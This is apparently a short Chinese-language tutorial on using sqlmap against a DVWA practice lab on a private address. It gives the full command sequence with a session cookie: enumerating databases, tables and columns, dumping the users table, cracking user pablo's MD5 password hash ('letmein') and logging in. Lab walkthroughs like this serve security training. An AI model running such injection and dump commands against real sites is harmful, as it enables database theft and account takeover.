http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"
期间会遇到一些询问,可以自己判断是还是否,也可以一路回车,最后将会显示出靶机的一些相关信息,比如数据库版本、系统类型等
利用—dbs参数获取数据库信息
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" --dbs
利用-D指定数据库,—tables查看该数据库下所有表
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa --tables
利用-T指定表,—colums查看该表下所有列
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa -T users --columns
最后利用-C指定列,—dump进行脱裤
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa -T users -C user,password --dump
对密码的MD5值进行解密,这里以pablo用户的密码MD5值为例
利用Sqlmap爆出的用户pablo,密码letmein进行登陆
成功登陆,关于sqlmap的用法还有很多,这里只介绍了最为常见的一种。